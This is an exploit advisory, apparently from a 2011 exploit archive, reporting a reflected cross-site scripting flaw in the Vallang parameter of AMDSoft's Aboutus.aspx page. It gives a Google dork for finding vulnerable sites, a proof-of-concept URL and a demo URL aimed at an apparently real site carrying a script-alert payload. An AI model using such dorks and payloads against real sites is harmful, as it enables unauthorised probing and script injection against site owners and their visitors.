AMDSoft Aboutus.aspx suffers from a cross site scripting vulnerability.
c5c3d3200bfacfda6197259e2b18c113c535662a00a21fe8f4da6f9258de285d
[~]=========================================================[~]
[~] Exploit Title......AMDSoft Aboutus.aspx Cross Site Scripting Vulnerability
[~] Google Dork........"Powered by AMDSoFT"
[~] Date...............05/26/2011
[~] Author.............Bl4ck.Viper [Turkish Hacker]
[~] Email..............Bl4ck.Viper@Gmail.com
[~] Software-Link$$$...http://www.iranfairit.com/main/index.aspx
[~] Version............All version
[~] Demo...............http://ab-borhani.com
[~]=========================================================[~]
[~] ~~ POC ~~
[~]
[~] http://target/[patch]/Aboutus.aspx?Vallang=[xss]
[~]
[~] ~~ Demo ~~
[~]
[~] http://ab-borhani.com/Main/Aboutus.aspx?Vallang=<script>alert("Xssed");</script>
[~]=========================================================[~]
[~] Spc tanx to all member Of: TBH ,Pentesters ,Ajaxtm ,PHC ...
[~] And All Iranian & Turkish Hackers !
[~]
[~]=========================================================[~]